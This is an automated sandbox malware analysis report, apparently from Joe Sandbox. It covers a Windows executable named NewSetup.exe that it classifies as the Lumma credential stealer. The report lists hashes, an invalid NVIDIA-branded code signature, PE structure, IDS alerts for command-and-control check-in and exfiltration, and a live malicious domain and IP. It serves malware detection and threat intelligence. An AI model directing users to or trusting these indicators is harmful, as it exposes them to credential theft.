                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://stingyerasjhru.click/lJTmNewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2275459919.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2273925137.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://crl.entrust.net/2048ca.crl0NewSetup.exefalse
                                                                                              		high
                                                                                              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaNewSetup.exe, 00000003.00000003.2240282371.0000000005A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.entrust.net/rpa0NewSetup.exefalse
                                                                                                  		high

                                                                                                  World Map of Contacted IPs

                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs

                                                                                                  Public IPs

                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  172.67.157.249
                                                                                                  		stingyerasjhru.clickUnited States
                                                                                                  		13335CLOUDFLARENETUStrue

                                                                                                  General Information

                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                  Analysis ID:1581500
                                                                                                  Start date and time:2024-12-27 22:39:04 +01:00
                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                  Overall analysis duration:0h 5m 48s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                  Number of analysed new started processes analysed:6
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Sample name:NewSetup.exe
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@4/1@1/1
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 97%
                                                                                                  • Number of executed functions: 32
                                                                                                  • Number of non-executed functions: 108
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .exe

                                                                                                  Warnings

                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 52.168.117.173, 13.107.246.63, 4.245.163.56
                                                                                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                  • VT rate limit hit for: NewSetup.exe

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  TimeTypeDescription
                                                                                                  16:39:57API Interceptor8x Sleep call for process: NewSetup.exe modified

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  172.67.157.249http://www.akagustos-kampanyasizlerle1.cloud/Get hashmaliciousHTMLPhisherBrowse

                                                                                                    Domains

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    stingyerasjhru.clicklauncher.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.58.80

                                                                                                    ASNs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    CLOUDFLARENETUSForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.66.86
                                                                                                    iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.60.24
                                                                                                    http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 104.17.25.14
                                                                                                    launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.58.80
                                                                                                    Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.66.86
                                                                                                    solara-executor.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 172.67.75.163
                                                                                                    Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 104.21.2.114
                                                                                                    Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 104.21.2.114
                                                                                                    http://proxyium.comGet hashmaliciousUnknownBrowse
                                                                                                    • 104.21.80.92
                                                                                                    https://cbhc9.anguatiab.ru/RpweC/Get hashmaliciousUnknownBrowse
                                                                                                    • 1.1.1.1

                                                                                                    JA3 Fingerprints

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    a0e9f5d64349fb13191bc781f81f42e1ForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.157.249
                                                                                                    iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.157.249
                                                                                                    launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.157.249
                                                                                                    Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.157.249
                                                                                                    search.htaGet hashmaliciousUnknownBrowse
                                                                                                    • 172.67.157.249
                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.157.249
                                                                                                    !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                    • 172.67.157.249
                                                                                                    @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.157.249
                                                                                                    Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                    • 172.67.157.249
                                                                                                    Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.157.249

                                                                                                    Dropped Files

                                                                                                    No context

                                                                                                    Created / dropped Files

                                                                                                    \Device\ConDrv

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\NewSetup.exe
                                                                                                    File Type:assembler source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14402
                                                                                                    Entropy (8bit):4.874636730022465
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:vlICCmV5fTMzsM3qlICCmV5fTMzsM3ip9guFx2rBhiLfmfU:vGCC+dMOGCC+dMY9guFx2rBo
                                                                                                    MD5:DF0EFD0545733561C6E165770FB3661C
                                                                                                    SHA1:0F3AD477176CF235C6C59EE2EB15D81DCB6178A8
                                                                                                    SHA-256:A434B406E97A2C892FA88C3975D8181EBEA62A8DA919C5221409E425DF50FD17
                                                                                                    SHA-512:3FF527435BC8BCF2640E0B64725CC0DB8A801D912698D4D94C44200529268B80AA7B59A2E2A2EA6C4621E09AA249AAA3583A8D90E4F5D7B68E0E6FFFEB759918
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:AcquireSRWLockExclusive..AcquireSRWLockShared..ActivateActCtx..ActivateActCtxWorker..AddAtomA..AddAtomW..AddConsoleAliasA..AddConsoleAliasW..AddDllDirectory..AddIntegrityLabelToBoundaryDescriptor..AddLocalAlternateComputerNameA..AddLocalAlternateComputerNameW..AddRefActCtx..AddRefActCtxWorker..AddResourceAttributeAce..AddSIDToBoundaryDescriptor..AddScopedPolicyIDAce..AddSecureMemoryCacheCallback..AddVectoredContinueHandler..AddVectoredExceptionHandler..AdjustCalendarDate..AllocConsole..AllocateUserPhysicalPages..AllocateUserPhysicalPagesNuma..AppPolicyGetClrCompat..AppPolicyGetCreateFileAccess..AppPolicyGetLifecycleManagement..AppPolicyGetMediaFoundationCodecLoading..AppPolicyGetProcessTerminationMethod..AppPolicyGetShowDeveloperDiagnostic..AppPolicyGetThreadInitializationType..AppPolicyGetWindowingModel..AppXGetOSMaxVersionTested..ApplicationRecoveryFinished..ApplicationRecoveryInProgress..AreFileApisANSI..AssignProcessToJobObject..AttachConsole..BackupRead..BackupSeek..BackupWrite..B

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                    Entropy (8bit):7.567180187346395
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                    File name:NewSetup.exe
                                                                                                    File size:569'384 bytes
                                                                                                    MD5:e8c9377a0dddc131e2291c3d7f4d69ed
                                                                                                    SHA1:c82b6d704cf41a98df3dd576a3a75093d89f0637
                                                                                                    SHA256:4e88703d3aafd146935f551706c7691c36cb34efd05d874c8ea0d49933702446
                                                                                                    SHA512:73b1a25e238cea527fc86836f3f550ed9947a24dac39b778ec4af2be755f63ff165a71f30dea8ba6ad63a77fb6a09d72af9ec13a622f80d0a1afbeaa53e21d70
                                                                                                    SSDEEP:12288:pYO6Dqzihouxpa+yWZ+QDKn5zXex8moYjG60VsZy/zQpYBqEO:uO6DThou2+y6b0o8moYy6SsZybiMqt
                                                                                                    TLSH:8EC4E0423691C4B3C95315769AB9D779493EBC200F615ACB93A80BFECEB02C15F31A5E
                                                                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....ng..........................................@.......................................@.................................|j..<..

                                                                                                    File Icon

                                                                                                    Icon Hash:00928e8e8686b000

                                                                                                    Static PE Info

                                                                                                    General

                                                                                                    Entrypoint:0x4104a0
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:true
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows cui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x676E98E6 [Fri Dec 27 12:09:10 2024 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:6
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:6
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:6
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:96d90e8808da099bc17e050394f447e7

                                                                                                    Authenticode Signature

                                                                                                    Signature Valid:false
                                                                                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                    Error Number:-2146869232
                                                                                                    Not Before, Not After
                                                                                                    • 12/01/2023 19:00:00 16/01/2026 18:59:59
                                                                                                    Subject Chain
                                                                                                    • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                                                                    Version:3
                                                                                                    Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                                                                    Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                                                                    Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                                                                    Serial:0997C56CAA59055394D9A9CDB8BEEB56

                                                                                                    Entrypoint Preview

                                                                                                    Instruction
                                                                                                    call 00007F02288C718Ah
                                                                                                    jmp 00007F02288C6FEDh
                                                                                                    mov ecx, dword ptr [0043B680h]
                                                                                                    push esi
                                                                                                    push edi
                                                                                                    mov edi, BB40E64Eh
                                                                                                    mov esi, FFFF0000h
                                                                                                    cmp ecx, edi
                                                                                                    je 00007F02288C7186h
                                                                                                    test esi, ecx
                                                                                                    jne 00007F02288C71A8h
                                                                                                    call 00007F02288C71B1h
                                                                                                    mov ecx, eax
                                                                                                    cmp ecx, edi
                                                                                                    jne 00007F02288C7189h
                                                                                                    mov ecx, BB40E64Fh
                                                                                                    jmp 00007F02288C7190h
                                                                                                    test esi, ecx
                                                                                                    jne 00007F02288C718Ch
                                                                                                    or eax, 00004711h
                                                                                                    shl eax, 10h
                                                                                                    or ecx, eax
                                                                                                    mov dword ptr [0043B680h], ecx
                                                                                                    not ecx
                                                                                                    pop edi
                                                                                                    mov dword ptr [0043B6C0h], ecx
                                                                                                    pop esi
                                                                                                    ret
                                                                                                    push ebp
                                                                                                    mov ebp, esp
                                                                                                    sub esp, 14h
                                                                                                    lea eax, dword ptr [ebp-0Ch]
                                                                                                    xorps xmm0, xmm0
                                                                                                    push eax
                                                                                                    movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                    call dword ptr [00436D00h]
                                                                                                    mov eax, dword ptr [ebp-08h]
                                                                                                    xor eax, dword ptr [ebp-0Ch]
                                                                                                    mov dword ptr [ebp-04h], eax
                                                                                                    call dword ptr [00436CB8h]
                                                                                                    xor dword ptr [ebp-04h], eax
                                                                                                    call dword ptr [00436CB4h]
                                                                                                    xor dword ptr [ebp-04h], eax
                                                                                                    lea eax, dword ptr [ebp-14h]
                                                                                                    push eax
                                                                                                    call dword ptr [00436D50h]
                                                                                                    mov eax, dword ptr [ebp-10h]
                                                                                                    lea ecx, dword ptr [ebp-04h]
                                                                                                    xor eax, dword ptr [ebp-14h]
                                                                                                    xor eax, dword ptr [ebp-04h]
                                                                                                    xor eax, ecx
                                                                                                    leave
                                                                                                    ret
                                                                                                    mov eax, 00004000h
                                                                                                    ret
                                                                                                    push 0043CF48h
                                                                                                    call dword ptr [00436D28h]
                                                                                                    ret
                                                                                                    push 00030000h
                                                                                                    push 00010000h
                                                                                                    push 00000000h
                                                                                                    call 00007F02288CDF63h
                                                                                                    add esp, 0Ch

                                                                                                    Data Directories

                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x36a7c0x3c.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x8e0000x3fc.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x88a000x2628.bss
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x3f0000x2744.reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x326080x18.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2ea980xc0.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x36c3c0x184.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                    Sections

                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x10000x2b4ca0x2b600ebf84c6b836020b1a66433a898baeab7False0.5443702719740634data6.596404756541432IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rdata0x2d0000xc50c0xc60096e76e7ef084461591b1dcd4c2131f05False0.40260022095959597data4.741850626178578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .data0x3a0000x37140x2800d87fd4546a2b39263a028b496b33108fFalse0.29814453125data5.024681407682101IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .tls0x3e0000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .reloc0x3f0000x27440x2800c7508b57e36483307c47b7dd73fc0c85False0.75166015625data6.531416896423856IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                    .bss0x420000x4b2000x4b200cb4aaa4c7f2be185e5ab2b917b4bde00False1.0003282289933444data7.999414414182457IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .rsrc0x8e0000x3fc0x4004243bfa36d7c6187562be2edfa0b46c2False0.443359375data3.391431520369637IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                    Resources

                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_VERSION0x8e0580x3a4dataEnglishUnited States0.44849785407725323

                                                                                                    Imports

                                                                                                    DLLImport
                                                                                                    KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThread, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetConsoleWindow, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                    USER32.dllShowWindow

                                                                                                    Possible Origin

                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                    EnglishUnited States

                                                                                                    Network Behavior

                                                                                                    Suricata IDS Alerts

                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2024-12-27T22:39:57.639998+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649709172.67.157.249443TCP
                                                                                                    2024-12-27T22:39:58.376516+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649709172.67.157.249443TCP
                                                                                                    2024-12-27T22:39:58.376516+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649709172.67.157.249443TCP
                                                                                                    2024-12-27T22:39:59.643972+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649710172.67.157.249443TCP
                                                                                                    2024-12-27T22:40:00.414616+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649710172.67.157.249443TCP
                                                                                                    2024-12-27T22:40:00.414616+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649710172.67.157.249443TCP
                                                                                                    2024-12-27T22:40:02.028641+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649711172.67.157.249443TCP
                                                                                                    2024-12-27T22:40:03.154379+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649711172.67.157.249443TCP
                                                                                                    2024-12-27T22:40:04.493219+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649713172.67.157.249443TCP
                                                                                                    2024-12-27T22:40:06.968159+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649714172.67.157.249443TCP
                                                                                                    2024-12-27T22:40:09.559896+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649724172.67.157.249443TCP
                                                                                                    2024-12-27T22:40:13.103475+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649732172.67.157.249443TCP
                                                                                                    2024-12-27T22:40:16.063147+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649743172.67.157.249443TCP

                                                                                                    Network Port Distribution

                                                                                                    TCP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Dec 27, 2024 22:39:56.372206926 CET49709443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:39:56.372246981 CET44349709172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:39:56.372323036 CET49709443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:39:56.375781059 CET49709443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:39:56.375814915 CET44349709172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:39:57.639786959 CET44349709172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:39:57.639997959 CET49709443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:39:57.644675016 CET49709443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:39:57.644687891 CET44349709172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:39:57.645030022 CET44349709172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:39:57.688005924 CET49709443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:39:57.688591003 CET49709443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:39:57.688606977 CET49709443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:39:57.688730001 CET44349709172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:39:58.376521111 CET44349709172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:39:58.376631021 CET44349709172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:39:58.376686096 CET49709443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:39:58.378454924 CET49709443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:39:58.378473043 CET44349709172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:39:58.378485918 CET49709443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:39:58.378490925 CET44349709172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:39:58.385803938 CET49710443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:39:58.385849953 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:39:58.385915995 CET49710443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:39:58.386174917 CET49710443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:39:58.386188984 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:39:59.643879890 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:39:59.643971920 CET49710443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:39:59.652252913 CET49710443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:39:59.652272940 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:39:59.652534008 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:39:59.653528929 CET49710443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:39:59.653546095 CET49710443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:39:59.653589964 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:00.414638996 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:00.414711952 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:00.414752960 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:00.414769888 CET49710443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:00.414789915 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:00.414827108 CET49710443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:00.414834023 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:00.414892912 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:00.414928913 CET49710443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:00.414933920 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:00.422941923 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:00.422991037 CET49710443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:00.423007011 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:00.431493044 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:00.431580067 CET49710443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:00.431592941 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:00.484922886 CET49710443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:00.534327030 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:00.578720093 CET49710443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:00.578738928 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:00.619679928 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:00.619743109 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:00.619875908 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:00.619914055 CET49710443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:00.619967937 CET49710443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:00.620212078 CET49710443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:00.620233059 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:00.620260000 CET49710443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:00.620265961 CET44349710172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:00.766388893 CET49711443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:00.766443014 CET44349711172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:00.766525030 CET49711443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:00.766886950 CET49711443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:00.766901970 CET44349711172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:02.028410912 CET44349711172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:02.028640985 CET49711443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:02.069133997 CET49711443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:02.069204092 CET44349711172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:02.069642067 CET44349711172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:02.113782883 CET49711443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:02.147587061 CET49711443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:02.149307013 CET49711443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:02.149347067 CET44349711172.67.157.249192.168.2.6
